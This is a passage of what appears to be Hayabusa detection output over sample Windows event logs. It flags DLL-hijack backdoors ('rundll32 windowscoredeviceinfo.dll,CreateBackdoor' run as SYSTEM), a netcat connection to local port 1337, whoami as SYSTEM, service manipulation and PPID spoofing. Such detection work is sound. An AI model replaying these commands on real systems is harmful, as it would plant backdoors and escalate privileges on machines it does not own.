Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.434 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.440 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.451 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.463 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.485 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.486 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.513 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.542 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.569 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 3364 | PGUID: 747F3D96-9F77-5E75-0000-0010D2E62000 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | LID: 0x3e7 | PID: 2416 | PGUID: 747F3D96-9F77-5E75-0000-001090F32000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:40.502 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49674 (MSEDGEWIN10) | Dst: 127.0.0.1:1337 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\rundll32.exe | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 2484 | PGUID: 747F3D96-9F7D-5E75-0000-00104E062100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4680 | PGUID: 747F3D96-9F86-5E75-0000-00101A9F2100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc stop CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 4876 | PGUID: 747F3D96-0A17-5E76-0000-001062373A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc query CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 1236 | PGUID: 747F3D96-0A1F-5E76-0000-0010375C3A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x2de87 | PID: 3808 | PGUID: 747F3D96-0A28-5E76-0000-0010882B3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net start CDPSvc | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 7072 | PGUID: 747F3D96-0A2B-5E76-0000-0010C02A3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\net1 start CDPSvc | Process: C:\Windows\System32\net1.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: net start CDPSvc | LID: 0x2de43 | PID: 7664 | PGUID: 747F3D96-0A2B-5E76-0000-0010A92C3D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:56.078 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - CDPSvc | Image: C:\ProgramData\chocolatey\bin\cdpsgshims.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00 | Hash: SHA1=B3314F0EEBBB88A8AC5CF790A706B65F962A3722,MD5=3C0D53F2A6341F6D793B1EB114E6FBF6,SHA256=CCCE37A8276ACE489A237A31181DF7E2B6F58D576C2410DE0A9C21F9F9937D12,IMPHASH=FE8C6819894B9677BB9D9642B2550AC9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.899 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 4464 | PGUID: 747F3D96-08DA-5E76-0000-001012352E00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 3696 | PGUID: 747F3D96-0A33-5E76-0000-0010B8813D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de87 | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:07.872 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2560 | PGUID: 747F3D96-0A48-5E76-0000-001051C83E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:38.828 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | PID: 2744 | PGUID: 747F3D96-0880-5E76-0000-001014202B00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-22 06:45:04.908 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f3fff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 4668 | Tgt PGUID: 747F3D96-06AA-5E76-0000-001046E10400,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x2de87 | PID: 7708 | PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-03-22 06:45:04.923 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 7708 | Tgt PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 404 | PGUID: 747F3D96-8AEC-5E76-0000-00101DDB8003,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 